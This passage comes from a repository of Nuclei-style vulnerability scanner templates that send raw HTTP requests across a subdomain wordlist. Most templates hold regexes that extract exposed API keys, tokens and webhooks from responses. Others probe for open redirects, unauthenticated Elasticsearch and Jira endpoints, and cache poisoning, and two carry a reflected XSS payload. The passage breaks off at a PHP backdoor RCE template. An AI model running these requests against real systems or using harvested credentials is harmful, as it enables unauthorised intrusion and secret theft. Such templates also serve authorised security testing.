18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/discord-webhook.yaml:
--------------------------------------------------------------------------------
1 | id: discord-webhook
2 |
3 | info:
4 | name: Discord Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,discord
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/fcm-server-key.yaml:
--------------------------------------------------------------------------------
1 | id: fcm-server-key
2 |
3 | info:
4 | name: FCM Server Key
5 | author: absshax
6 | severity: high
7 | tags: exposure,token,google
8 | reference: https://abss.me/posts/fcm-takeover
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | extractors:
24 | - type: regex
25 | part: body
26 | regex:
27 | - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/google-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-api-key
2 |
3 | info:
4 | name: Google API Key
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /hopfully404 HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "AIza[0-9A-Za-z\\-_]{35}"
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/google-calendar-link.yaml:
--------------------------------------------------------------------------------
1 | id: google-calendar-link
2 |
3 | info:
4 | name: Google Calendar URI Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/jdbc-connection-string.yaml:
--------------------------------------------------------------------------------
1 | id: jdbc-connection-string
2 |
3 | info:
4 | name: JDBC Connection String Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/jwt-token.yaml:
--------------------------------------------------------------------------------
1 | id: jwt-token
2 |
3 | info:
4 | name: JWT Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/mailchimp-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: mailchimp-access-key-value
2 |
3 | info:
4 | name: Mailchimp API Value
5 | author: puzzlepeaches
6 | severity: info
7 | tags: exposure,token,mailchimp
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "[0-9a-f]{32}-us[0-9]{1,2}"
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-admin-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-admin-api-key
2 |
3 | info:
4 | name: Admin API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRAA-[a-f0-9]{27}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-insights-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-insights-key
2 |
3 | info:
4 | name: Insights Keys Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-rest-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-rest-api-key
2 |
3 | info:
4 | name: REST API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRRA-[a-f0-9]{42}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-synthetics-location-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-synthetics-location-key
2 |
3 | info:
4 | name: Synthetics Location Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/oauth-access-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-oauth-access-key
2 |
3 | info:
4 | name: Google OAuth Access Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'ya29\.[0-9A-Za-z\-_]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/picatic-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: picatic-api-key
2 |
3 | info:
4 | name: Picatic API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'sk_live_[0-9a-z]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/sendgrid-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: sendgrid-api-key
2 |
3 | info:
4 | name: Sendgrid API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/shoppable-token.yaml:
--------------------------------------------------------------------------------
1 | id: shoppable-token
2 |
3 | info:
4 | name: Shoppable Service Auth Token
5 | author: philippedelteil
6 | severity: info
7 | reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | part: body
25 | words:
26 | - data-shoppable-auth-token
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-bot-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-bot-token
2 |
3 | info:
4 | name: Slack access token
5 | author: nadino
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "xoxb-[0-9A-Za-z\\-]{51}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-user-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-user-token
2 |
3 | info:
4 | name: Slack User token disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "xoxp-[0-9A-Za-z\\-]{72}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-webhook-token
2 |
3 | info:
4 | name: Slack Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/sonarqube-token.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-token
2 |
3 | info:
4 | name: SonarQube Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/stripe-restricted-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-restricted-key
2 |
3 | info:
4 | name: Stripe Restricted Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/stripe-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-secret-key
2 |
3 | info:
4 | name: Stripe Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/zapier-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: zapier-webhook-token
2 |
3 | info:
4 | name: Zapier Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/zoho-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: zoho-webhook-token
2 |
3 | info:
4 | name: Zoho Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'
--------------------------------------------------------------------------------
/Templates/Misconfiguration/attitude-theme-open-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: attitude-theme-open-redirect
2 |
3 | info:
4 | name: WordPress Attitude Themes 1.1.1 Open Redirection
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://cxsecurity.com/issue/WLB-2020030185
8 | tags: wordpress,wp-theme,redirect
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:
23 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/brandfolder-open-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: brandfolder-open-redirect
2 |
3 | info:
4 | name: Wordpress brandfolder plugin Open Redirect
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://www.exploit-db.com/exploits/39591
8 | tags: wordpress,wp-plugin,lfi,rfi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:
23 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/cache-poisoning.yaml:
--------------------------------------------------------------------------------
1 | id: cache-poisoning
2 |
3 | info:
4 | name: Cache Poisoning
5 | author: melbadry9,xelkomy
6 | severity: info
7 | reference: |
8 | - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
9 | - https://portswigger.net/research/practical-web-cache-poisoning
10 | tags: cache
11 |
12 | requests:
13 | - payloads:
14 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
15 | attack: sniper
16 | threads: 100
17 |
18 | raw:
19 | - |
20 | GET / HTTP/1.1
21 | Host: {{Subdomains}}
22 | X-Forwarded-Prefix:
23 | X-Forwarded-Host:
24 | X-Forwarded-For:
25 | matchers:
26 | - type: word
27 | words:
28 | - ""
29 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/eatery-restaurant-open-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: eatery-restaurant-open-redirect
2 |
3 | info:
4 | name: WordPress Attitude Themes 1.1.1 Open Redirection
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://cxsecurity.com/issue/WLB-2020030183
8 | tags: wordpress,wp-theme,redirect
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:
23 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/elasticsearch-1.yaml:
--------------------------------------------------------------------------------
1 | id: elasticsearch 1
2 |
3 | info:
4 | name: ElasticSearch Information Disclosure
5 | author: Shine
6 | severity: low
7 | tags: elastic,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_cat/indices?v HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - '"took":'
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/elasticsearch-2.yaml:
--------------------------------------------------------------------------------
1 | id: elasticsearch 2
2 |
3 | info:
4 | name: ElasticSearch Information Disclosure
5 | author: Shine
6 | severity: low
7 | tags: elastic,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_all/_search HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - '"took":'
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/exposed-kafdrop.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-kafdrop
2 |
3 | info:
4 | name: Publicly exposed Kafdrop Interface
5 | author: dhiyaneshDk
6 | severity: low
7 | tags: exposure,misconfig
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Kafdrop: Broker List"
26 | - "Kafka Cluster Overview"
27 | condition: and
28 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/jira-unauthenticated-user-picker.yaml:
--------------------------------------------------------------------------------
1 | id: jira-unauthenticated-user-picker
2 |
3 | info:
4 | name: Jira Unauthenticated User Picker
5 | author: TechbrunchFR
6 | severity: info
7 | tags: atlassian,jira
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'user-picker'
--------------------------------------------------------------------------------
/Templates/Misconfiguration/jkstatus-manager.yaml:
--------------------------------------------------------------------------------
1 | id: jkstatus-manager
2 |
3 | info:
4 | name: JK Status Manager
5 | author: pdteam
6 | severity: low
7 | tags: config
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /jkstatus/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | X-Forwarded-For: 127.0.0.1
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - "JK Status Manager"
27 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/lucee-xss-1.yaml:
--------------------------------------------------------------------------------
1 | id: lucee-xss 1
2 |
3 | info:
4 | name: Lucee Unauthenticated Reflected XSS
5 | author: incogbyte
6 | severity: medium
7 | tags: lucee,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "
"
24 | - "MissingIncludeException"
25 | - "lucee-err"
26 | part: body
27 | condition: and
28 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/lucee-xss-2.yaml:
--------------------------------------------------------------------------------
1 | id: lucee-xss 2
2 |
3 | info:
4 | name: Lucee Unauthenticated Reflected XSS
5 | author: incogbyte
6 | severity: medium
7 | tags: lucee,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - ""
24 | - "MissingIncludeException"
25 | - "lucee-err"
26 | part: body
27 | condition: and
28 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/nginx-status.yaml:
--------------------------------------------------------------------------------
1 | id: nginx-status
2 |
3 | info:
4 | name: Nginx Status Page
5 | author: dhiyaneshDK
6 | severity: low
7 | tags: misconfig,nginx
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /nginx_status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Active connections:'
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/php-zerodium-backdoor-rce.yaml:
--------------------------------------------------------------------------------
1 | id: php-zerodium-backdoor-rce
2 |
3 | info:
4 | name: PHP Zerodium Backdoor RCE
5 | author: dhiyaneshDk
6 | reference: https://news-web.php.net/php.internals/113838
7 | severity: high
8 | tags: php,backdoor
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
